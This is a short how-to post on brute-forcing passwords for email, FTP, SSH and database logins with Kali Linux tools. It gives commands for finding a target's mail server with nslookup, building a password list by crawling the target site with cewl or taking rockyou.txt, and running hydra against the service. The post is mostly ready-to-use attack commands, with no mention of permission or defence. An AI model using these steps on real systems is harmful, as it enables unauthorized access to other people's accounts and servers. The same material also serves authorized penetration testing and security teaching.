Planet Red


To brute force SMTP, FTP, SSH, MySQL or other services you can use a simple tool located in Kali Linux, Hydra.

Locate email address / username and email server. 

Command: nslookup <DOMAIN>

Example: nslookup

Generate a worlist using cewl or use rockyou.txt

CEWL Method

Command: cewl –write customwordlist.txt –depth 5 –min_word_length 8 https://<domain> –verbose

Example: cewl –write customwordlist.txt –depth 5 –min_word_length 8 –verbose

Brute force attack on server using email address and wordlist for password

Command: hydra -l <USERNAME> -P <WORDLIST> <SERVICE>://<SERVER>

Example: hydra -l -P rockyou.txt smtp://

For a precise and faster bruteforce use the cewl method to create a wordlist by scanning the site for keywords. You can then use the custom wordlist with hydra. Alternatively you can use rockyou.txt which is a default wordlist with Kali Linux with more than 14 million possible password combinations.